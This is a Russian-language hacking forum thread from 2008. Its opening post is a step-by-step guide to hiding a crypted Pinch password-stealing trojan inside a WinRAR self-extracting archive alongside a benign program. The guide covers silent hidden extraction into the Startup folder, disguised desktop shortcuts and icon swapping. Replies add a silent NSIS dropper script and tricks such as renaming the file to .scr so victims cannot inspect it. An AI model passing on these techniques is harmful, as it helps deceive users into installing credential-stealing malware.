Джойнер-WinRAR

Discussion in 'Безопасность и Анонимность' started by alexman90, 6 Feb 2008.

  1. alexman90

    alexman90 Banned

    Joined:
    25 Oct 2007
    Messages:
    80
    Likes Received:
    74
    Reputations:
    -5
    Здравствуйте, решил написал как с помощью WinRAR'a склеивать файлы... (использовать как джойнер)
    Думаю что WinRAR есть у всех, по-этому приступим сразу к делу.
    Я буду описывать пример склейки троянца с другой программой... (в принципе можно и с фоткой)
    Поехали=)
    1. Для начала берём пинч, криптуем, (прячем код от антивирусов, чтобы не спалить нашего коня) затем какую-нибудь программу, (например калькулятор:) и ВинРАР...
    2. Теперь заходим в папку где у нас лежат pinch.exe, программа .exe. Выделяем их, и нажимаем провой кнопкой мыши и контекстном меню выбираем, "Добавить в архив" в открывшемся окне ставим галочку, "Создать SFX-архив" затем переходим во-вкладку "Комментарии" и пишем в поле ввода:
    Setup=pinch.exe
    Setup=programma.exe. ЗЫ за идею о коментах спс Stalin'у
    Переходим во-вкладку "Дополнительно" нажимаем на "Параметры SFX" далее в открывшемся окне во-вкладке "общие" Вы можете указать абсолютный путь распоковки ваших файлов... (например в автозагрузку...ну или куда-нибудь в папку пиндовс...так же можно заменить не использующиеся на данный момент файлы...хоть системные!!! то можете убить винду...например если заменить лицензионный ключ виндовс на какой-нибудь пустой файл, то винда не загрузится!) итак, указываем например как обсалютный путь "C:\Documents and Settings\All Users.WINDOWS\Главное меню\Программы\Автозагрузка" (для XP) (без ковычек). Переходим во-вкладку "Дополнительно" нажмите "Добавить ярлык" и выбирайте что Вашей душе угодно... (напрмер опять же в автозагрузку или на рабочий стол... (например если у Вас Кейлоггер, то можете отправить его на рабочий стол, допустим как Qip... Впишите где неписано "Имя файла для которого будет создан ярлык" в нашем случае, pinch.exe или programma.exe.. Поле "папка в которую будет перемещён яррлык" в принципе можете оставить пустым... там где "описания ярлыка" пишите что хотите... когда чел наведёт мышу на ярлык то высветиться то что Вы сдесь напишете... ну для qip можем написать "Интернет-пейджер" И имя ярлыка напишите qip (это если мы ярлык на рабочий стол кидаем). Переходим во-вкладку "Режимы". Там где "Режим вывода информации" выбирите "Скрыть всё", а там где "Режим перезаписи" выбирите "Перезаписывать все файлы без запроса" ( лишнее паливо же нам не нужно :). Далее переходим во-вкладку "Текст и графика" туда где "Логотип и значёк SFX-архива. Нам нужно "Загрузить значёк SFX из файла, нажимаем "Обзор" и выбирием иконку для архива!! ТОЛЬКО *.ico .... другие форматы к сожалению не поддерживаются...но в сети куча иконок! можете скачать огромный архив у GLOFF'a www.glofff.com... поищите там :) либо на форуме... www.forum.glofff.com...
    Ну а если Вам Оочень нужно брать иконки из *.exe; *.jpg; *.bmp и т.д. то Вы можете воспользоваться программой ResHacker (или подобными).
    Скачать Ресурс Хакер можно у меня на форуме или узайте Поисковик
    Если будем использовать РесурсХакер, то делаем следующее:
    Скачиваем архив, разорхивируем, запускаем ResHacker.exe.... открываем в РесурсХакере наш уже склееный пинч (SFX-архив) и смотрим секцию под названием "icon" дальше смотрим в этой секции иконку нашего SFX-архива... потом нажимаете правой кнопкой мышки на цифру секции, будет написано "Replace Resourse" нажимаете, затем нажимаете "Open file with new icon" и выбираите любую понравившуюся вам иконку, сохраняем и юзаем.
    Ну вроде всё, спасибо за внимание!
     
    #1 alexman90, 6 Feb 2008
    Last edited: 6 Feb 2008
    3 people like this.
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Честно говоря, баян... Но может для кого-то было познавательно.
    Была такая статейка про Orien+WinRAR. Там ориеном на запуск пинча ставили пароль, а в свойствах архива делали запуск с параметром !pass=....
    Типа криптовка получалась- только архив весил дофига после этого
    http://forum.antichat.ru/showthread.php?t=41878
     
    2 people like this.
  3. stalin

    stalin Member

    Joined:
    2 Oct 2007
    Messages:
    17
    Likes Received:
    23
    Reputations:
    0
    боян =) бородатый ;)
    да и зачем bat файл использовать? если можно просто в каментах к архиву прописать:
    Setup=file1.exe
    Setup=file2.exe
    Setup=file3.exe
    etc.....

    з.ы. можно сказать оригенал статьи ->сдесь<- написан более грамотно чем у ТС, да и ещё в 2005 году ;)
     
    #3 stalin, 6 Feb 2008
    Last edited: 6 Feb 2008
  4. alexman90

    alexman90 Banned

    Joined:
    25 Oct 2007
    Messages:
    80
    Likes Received:
    74
    Reputations:
    -5
    Почему "орегенал статьи"? я не претендовал конечно на авторство идеи, т.к. сам хз когда читал подобное... но я не копипасил, а написал сам! и про РесурсХакер там не было сказано... ЗЫ кстати про РесурсХАкер я узнал от Вас Сталин в редми пинча от Шайтана (вроде)
    ЗЫ на счёт коментов:
    Setup=file1.exe
    Setup=file2.exe
    Setup=file3.exe не подумал... спс
     
    #4 alexman90, 6 Feb 2008
    Last edited: 6 Feb 2008
    1 person likes this.
  5. n0153r

    n0153r Elder - Старейшина

    Joined:
    19 Jun 2007
    Messages:
    260
    Likes Received:
    92
    Reputations:
    11
    Старенький метод.
    Да и не думаю что таким методом можно достичь норм результата.
     
  6. Грот

    Грот Elder - Старейшина

    Joined:
    24 Jan 2008
    Messages:
    110
    Likes Received:
    36
    Reputations:
    0
    да и клееный таким способом фаил легко извлеч нажатим на него правой кнопки сразу увидишь что извлеч как рар архив а в джуниорах такой лабуды нет
     
  7. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    за старание +1 но не более того, аналогов статье данной великое множество, если бы сделал покрасивее со скринами, с видео и т.д. и т.п. тогда бы ещё оценить можно, а честно говоря "сухой" текст читать даже в лом.
     
  8. Pernat1y

    Pernat1y Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    кстати, насчет склейки 'честным' софтом )
    пример скрипта nsis (установщик такой)

    Code:
    Name "Silent installer"
    OutFile "bind.exe"
    Icon "bind.ico"
    
    Function .onInit
    SetSilent silent
    FunctionEnd
    
    Section
    File /oname=$PROGRAMFILES\file1.exe file1.exe
    Exec '"$PROGRAMFILES\file1.exe"'
    File /oname=$PROGRAMFILES\file2.exe file2.exe
    Exec '"$PROGRAMFILES\file2.exe"'
    File /oname=$PROGRAMFILES\file3.exe file3.exe
    Exec '"$PROGRAMFILES\file3.exe"'
    FileClose $0
    AllowSkipFiles on
    SectionEnd
     
  9. GOPPA

    GOPPA Member

    Joined:
    26 Sep 2007
    Messages:
    13
    Likes Received:
    5
    Reputations:
    0
    Меняешь расширение на scr и усё правой кнопкой уже не извлеч!